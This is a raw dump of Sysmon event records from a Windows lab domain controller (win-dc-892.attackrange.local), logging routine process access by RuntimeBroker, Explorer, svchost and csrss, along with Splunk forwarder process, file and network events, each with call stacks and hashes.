12:09:58.047{266CAFBE-64C4-6064-9B00-00000000AE01}49246044C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+16cb1|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e 10341000x800000000000000011162Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:58.047{266CAFBE-64C4-6064-9B00-00000000AE01}49246092C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+16cb1|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e 10341000x800000000000000011161Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:58.047{266CAFBE-64C4-6064-9B00-00000000AE01}49245412C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+26297|C:\Windows\system32\windows.cortana.Desktop.dll+214fb|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000011160Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:58.047{266CAFBE-64C4-6064-9B00-00000000AE01}49245412C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+21491|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 354300x800000000000000011210Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:58.553{266CAFBE-64F5-6064-0301-00000000AE01}6500C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local53718-false10.0.1.12-8000- 23542300x800000000000000011209Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:59.860{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8AF4D1D5643D87066AC7CFDACDAEB8EC,SHA256=AA0C43BBED5843FE58019D18D6E4E9EA2686F40EC6DE896009851E109785CABF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000011211Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:00.875{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=26CEE4CB5FF5F7F8CD5B6E40A34A9605,SHA256=D836965325B4E1E0C9FBCBE8E463C1399617D62599C17F15C8E6712589AB6B8F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000011219Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:01.984{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0BEEFB3466E9C8844112D85465ED21A2,SHA256=164A40701B90317D258E2578654F1ECB340F42430AC07874F04B797D127390A4,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000011218Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:01.516{266CAFBE-64C5-6064-A500-00000000AE01}43565264C:\Windows\Explorer.EXE{266CAFBE-6660-6064-6B01-00000000AE01}1532C:\Windows\System32\NOTEPAD.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7a3f|C:\Windows\System32\SHELL32.dll+b97c5|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011217Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:01.516{266CAFBE-64C5-6064-A500-00000000AE01}43565264C:\Windows\Explorer.EXE{266CAFBE-6660-6064-6B01-00000000AE01}1532C:\Windows\System32\NOTEPAD.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b96de|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011216Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:01.516{266CAFBE-64C5-6064-A500-00000000AE01}43565264C:\Windows\Explorer.EXE{266CAFBE-6660-6064-6B01-00000000AE01}1532C:\Windows\System32\NOTEPAD.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7144|C:\Windows\System32\SHELL32.dll+b96a7|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011215Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:01.516{266CAFBE-64C5-6064-A500-00000000AE01}43565484C:\Windows\Explorer.EXE{266CAFBE-6660-6064-6B01-00000000AE01}1532C:\Windows\System32\NOTEPAD.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7a3f|C:\Windows\System32\SHELL32.dll+b7f60|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011214Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:01.516{266CAFBE-64C5-6064-A500-00000000AE01}43565484C:\Windows\Explorer.EXE{266CAFBE-6660-6064-6B01-00000000AE01}1532C:\Windows\System32\NOTEPAD.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+112150|C:\Windows\System32\SHELL32.dll+b7f1c|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011213Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:01.516{266CAFBE-64C5-6064-A500-00000000AE01}43565484C:\Windows\Explorer.EXE{266CAFBE-6660-6064-6B01-00000000AE01}1532C:\Windows\System32\NOTEPAD.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7144|C:\Windows\System32\SHELL32.dll+b7ef0|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011212Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:01.516{266CAFBE-64C5-6064-A500-00000000AE01}43565484C:\Windows\Explorer.EXE{266CAFBE-6660-6064-6B01-00000000AE01}1532C:\Windows\System32\NOTEPAD.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d319|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011251Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:02.953{266CAFBE-64EE-6064-D900-00000000AE01}53082340C:\Windows\system32\conhost.exe{266CAFBE-669A-6064-7901-00000000AE01}1164C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011250Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:02.953{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011249Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:02.953{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011248Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:02.953{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011247Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:02.953{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011246Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:02.953{266CAFBE-6469-6064-0500-00000000AE01}6242352C:\Windows\system32\csrss.exe{266CAFBE-669A-6064-7901-00000000AE01}1164C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x800000000000000011245Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:02.953{266CAFBE-64ED-6064-D500-00000000AE01}56481476C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{266CAFBE-669A-6064-7901-00000000AE01}1164C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x800000000000000011244Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:02.954{266CAFBE-669A-6064-7901-00000000AE01}1164C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{266CAFBE-64ED-6064-D500-00000000AE01}5648C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000011243Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:02.859{266CAFBE-646C-6064-0D00-00000000AE01}6126772C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011242Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:02.797{266CAFBE-64C4-6064-9B00-00000000AE01}49245412C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+16557|C:\Windows\system32\windows.cortana.Desktop.dll+12d9b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000011241Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:02.797{266CAFBE-64C4-6064-9B00-00000000AE01}49245412C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+12d31|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000011240Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:02.781{266CAFBE-64C5-6064-A500-00000000AE01}43562224C:\Windows\Explorer.EXE{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109196|C:\Windows\System32\TwinUI.dll+82af7|C:\Windows\System32\TwinUI.dll+beb2e|C:\Windows\System32\TwinUI.dll+beaf9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011239Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:02.781{266CAFBE-64C5-6064-A500-00000000AE01}43562224C:\Windows\Explorer.EXE{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109196|C:\Windows\System32\TwinUI.dll+82af7|C:\Windows\System32\TwinUI.dll+beb2e|C:\Windows\System32\TwinUI.dll+beaf9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011238Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:02.781{266CAFBE-64C4-6064-9B00-00000000AE01}49245412C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\execmodelclient.dll+8e62|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 